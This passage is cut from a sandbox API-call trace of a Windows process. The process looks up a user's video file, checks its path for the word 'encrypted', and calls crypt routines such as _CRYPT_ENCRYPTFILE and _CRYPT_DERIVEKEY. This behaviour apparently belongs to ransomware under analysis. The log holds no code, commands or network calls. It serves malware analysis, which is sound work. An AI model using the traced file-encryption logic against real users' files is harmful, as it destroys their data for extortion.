dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0xae7836b0, ftLastWriteTime.dwHighDateTime=0x1d5c186, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0x7c20c0 [0042.635] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0xae7836b0, ftLastWriteTime.dwHighDateTime=0x1d5c186, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x0, dwReserved1=0x777648, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0x7c20c0 [0042.635] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QGDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wWOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WOzy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ozy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zy63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZvixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ixsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xsE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sE8A.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.637] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.637] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.637] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebbdb30, ftCreationTime.dwHighDateTime=0x1d5b93c, ftLastAccessTime.dwLowDateTime=0xae7836b0, ftLastAccessTime.dwHighDateTime=0x1d5c186, ftLastWriteTime.dwLowDateTime=0xae7836b0, ftLastWriteTime.dwHighDateTime=0x1d5c186, nFileSizeHigh=0x0, nFileSizeLow=0x14128, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="yQGDwWOzy63yZvixsE8A.mp4", cAlternateFileName="YQGDWW~1.MP4")) returned 0x7c2100 [0042.638] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.638] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.638] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.638] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.639] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.639] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.639] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.639] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.639] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.639] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.640] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.640] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.640] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.641] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.641] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.641] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.642] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.642] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.642] CharLowerBuffW 